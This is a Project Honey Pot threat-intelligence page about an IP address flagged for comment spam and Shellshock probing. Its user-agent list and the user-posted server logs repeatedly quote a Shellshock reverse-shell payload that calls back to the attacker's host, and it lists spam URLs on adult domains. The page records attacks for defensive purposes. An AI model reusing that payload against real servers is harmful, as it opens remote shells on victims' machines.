IP Address Inspector

ATTENTION
  • This IP has not seen any suspicious activity within the last 3 months. This IP is most likely clean and trustworthy now. (This record will remain public for historical purposes, however.)

104.192.0.18

The Project Honey Pot system has detected behavior from the IP address consistent with that of a comment spammer. Below we've reported some other data associated with this IP. This interrelated data helps map spammers' networks and aids in law enforcement efforts. If you know something about this IP, please leave a comment.

Lookup IP In: Domain Tools | SpamHaus | Spamcop | SenderBase | Google Groups | Google

Geographic Location United States United States
Spider First Seen approximately 9 months, 2 weeks ago
Spider Last Seen within 6 months, 4 weeks
Spider Sightings 26 visit(s)
User-Agents seen with 30 user-agent(s)

First Post On approximately 9 months, 2 weeks ago
Last Post On within 9 months, 2 weeks
Form Posts 3 web post submission(s) sent from this IP

IPs In The Neighborhood
104.192.0.11 United States
104.192.0.16 United States
104.192.0.17 United States
104.192.0.19 United States
104.192.0.20 United States
104.192.0.21 United States
104.192.0.22 United States
104.192.0.23 United States
104.192.0.50 United States
104.192.0.57 United States
104.192.0.58 | C United States
104.192.0.75 United States
104.192.0.98 United States
104.192.0.122 United States
104.192.0.130 | W United States
104.192.0.132 United States
104.192.0.146 United States
104.192.0.153 | D United States
104.192.0.157 United States
104.192.0.158 United States
104.192.0.162 | D United States
104.192.0.168 United States
104.192.0.169 United States
104.192.0.170 United States
104.192.0.173 United States
104.192.0.187 United States
104.192.0.188 | W United States
104.192.0.198 United States
104.192.0.202 | S United States
104.192.0.206 | S United States
104.192.0.226 United States
104.192.0.229 United States
104.192.0.234 United States
Sample Spam URLs & Keywords Posted From 104.192.0.18
Domain: shemale.replyme.pw
URL: http://shemale.replyme.pw/?page-kari
Domain: erotic.apps.android.blogporn.in
URL: http://erotic.apps.android.blogporn.in/?page.miracle
Domain: arab.egypt.adultnet.in
URL: http://arab.egypt.adultnet.in/?entry-taliyah
Domain: vanessa.blog.porndairy.in
URL: http://vanessa.blog.porndairy.in/?post.alina
Domain: androidporn.blognet.pw
URL: http://androidporn.blognet.pw/?mail.alaina
Domain: sissyblog.twiclub.in
URL: http://sissyblog.twiclub.in/?profile.jacqueline
Domain: hotpic.erolove.in
URL: http://hotpic.erolove.in/?entry.taniya
Domain: shemales.xblog.in
URL: http://shemales.xblog.in/?post-amara
Domain: whipme.yopoint.in
URL: http://whipme.yopoint.in/?gain.bailee
Domain: strapon.adultnet.in
URL: http://strapon.adultnet.in/?exclusive.denisse
Domain: hotties.pictures.erolove.in
URL: http://hotties.pictures.erolove.in/?post.annika
Domain: dailyfeminisation.yopoint.in
URL: http://dailyfeminisation.yopoint.in/?page.joana
Domain: teen.porndairy.in
URL: http://teen.porndairy.in/?jade
Domain: android.adult.games.yopoint.in
URL: http://android.adult.games.yopoint.in/?diagram.kelli
Domain: stripclub.erolove.in
URL: http://stripclub.erolove.in/?paginate_kendall
104.192.0.18's User Agent Strings
() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/5.0; MyIE2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; FDM)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.99 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
W.Backslash AG commented...
form-spam
September 18 2023 03:00 AM

S.Chou commented...
104.192.0.18 - - [14/Apr/2015:04:15:44 +0800] "GET /HNAP1 HTTP/1.0" 301 - "-" "-"
April 13 2015 06:46 PM

Y.Rootberg commented...
found accessing site with request header blank except for a request for the resource:
/contactrobforsupportticketsorperhapssomeoneatecatel.html
January 12 2015 12:36 PM

J.Woody commented...
ATTEMPTED SHELLSHOCK EXPLOIT HACK

188.10.85.113 - Italy - Telecom Italia - S.p.a.iptv Platform - Resolve Host: host113-85-static.10-188-b.business.telecomitalia.it
74.71.104.229 - United States - New York City - Time Warner Cable Internet Llc - Resolve Host: cpe-74-71-104-229.nyc.res.rr.com
212.117.58.20 - Bulgaria - Sofia - Speedy Net Ead - Resolve Host: client-58-20.speedy-net.bg
104.192.0.18 - United States - Rye - Datawagon Llc
206.124.212.121 - United States - Baton Rouge - Eatel

SMALL SAMPLE:
188.10.85.113 - - [22/Oct/2014:06:17:37 +0100] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 403 xxx "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
188.10.85.113 - - [22/Oct/2014:06:17:37 +0100] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.1" 403 xxx "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
188.10.85.113 - - [22/Oct/2014:06:17:38 +0100] "GET /cgi-sys/realsignup.cgi HTTP/1.1" 403 xxx "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
74.71.104.229 - - [22/Oct/2014:06:32:43 +0100] "GET /tmUnblock.cgi HTTP/1.1" 403 xxx "-" "-"
212.117.58.20 - - [22/Oct/2014:07:17:54 +0100] "GET /tmUnblock.cgi HTTP/1.1" 403 xxx "-" "-"
104.192.0.18 - - [22/Oct/2014:08:39:57 +0100] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 403 xxx "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
104.192.0.18 - - [22/Oct/2014:08:39:58 +0100] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 403 xxx "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
104.192.0.18 - - [22/Oct/2014:08:39:58 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 xxx "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
206.124.212.121 - - [22/Oct/2014:09:52:33 +0100] "GET /tmUnblock.cgi HTTP/1.1" 403 xxx "-" "-"
October 22 2014 10:46 AM

R.Dunkle commented...
shellshock exploits - member Conficker C botnet
Net Range 104.192.0.0 - 104.192.3.255
CIDR 104.192.0.0/22
Name DataWagon LLC
Handle DL-167
Street 3 Mead Pond Lane
City Rye
State/Province NY
Postal Code 10580
Country US
October 22 2014 06:21 AM

Y.Rootberg commented...
Useragent of ()+{+ignored;};/bin/bash+-i+>&+/dev/tcp/104.192.0.18/8888+0>&1

Found accessing site with a bunch of requests for /CGI-SYS/... with no accept header.
October 21 2014 02:44 PM

B.Slack5 commented...
[Tue Oct 21 15:40:30 2014] [error] [client 104.192.0.18] File does not exist: /var/www/cgi-sys
[Tue Oct 21 15:40:30 2014] [error] [client 104.192.0.18] File does not exist: /var/www/cgi-sys
[Tue Oct 21 15:40:30 2014] [error] [client 104.192.0.18] File does not exist: /var/www/cgi-sys
October 21 2014 02:30 PM

B.Lemieux commented...
104.192.0.18 - - [21/Oct/2014:05:33:38 -0400] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 223 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"

104.192.0.18 - - [21/Oct/2014:05:33:38 -0400] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 224 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"

104.192.0.18 - - [21/Oct/2014:05:33:38 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"

104.192.0.18 - - [21/Oct/2014:05:33:38 -0400] "GET /index.php HTTP/1.0" 200 2050 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
October 21 2014 07:49 AM

Page generated on: April 27 2024 03:27:44 PM
sonyajewell962@vbwebmail.com byronaldrich156@yahoo.com derekgustafson625@yahoo.com byronaldrich156@gmail.com
do not follow this link

Privacy Policy | Terms of Use | About Project Honey Pot | FAQ | Cloudflare Site Protection | Contact Us

Copyright © 2004–24, Unspam Technologies, Inc. All rights reserved.

Advertisements displayed on this page are not necessarily endorsed by Project Honey Pot

contact | wiki | email